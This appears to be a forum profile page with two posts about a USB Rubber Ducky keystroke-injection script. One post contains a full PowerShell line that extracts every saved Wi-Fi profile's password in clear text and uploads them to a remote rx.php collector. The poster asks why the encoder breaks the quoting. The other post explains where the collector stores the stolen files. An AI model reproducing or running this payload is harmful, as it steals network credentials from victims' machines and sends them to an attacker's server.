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Posts posted by voidnecron_

  1. Why would you netcat if you use the rx.php script?
    Just look into the web directory where rx.php is located and there should be all the files created by the script.
    Tip: Check the apache error log, in my case the use apache runs with (www-data) didn't have write permissions in this folder and thus the rx.php couldn't create files.

  2. Hi all,

    I've created a ducky script which works fine when I execute the commands by hand, but fails after being encoded and run with the duck.
    The line in the code is:

    STRING $d=netsh wlan show profiles|sls -Pattern 'All User'|Foreach{$_.ToString()};$c=$d|Foreach{$_.Replace('    All User Profile     : ',$null)};$z=ForEach($w in $c){netsh wlan show profiles $w key=clear};$p=$z|sls -Pattern 'SSID name','Key Content';(New-Object Net.WebClient).UploadString('http://IP_REMOVED/rx.php', $p)

    However the quote between -Pattern and All User is being dropped, as well as a single space from '    All User Profile'.

    Does anyone know why the encoding fails/does this? Bug in encoder?


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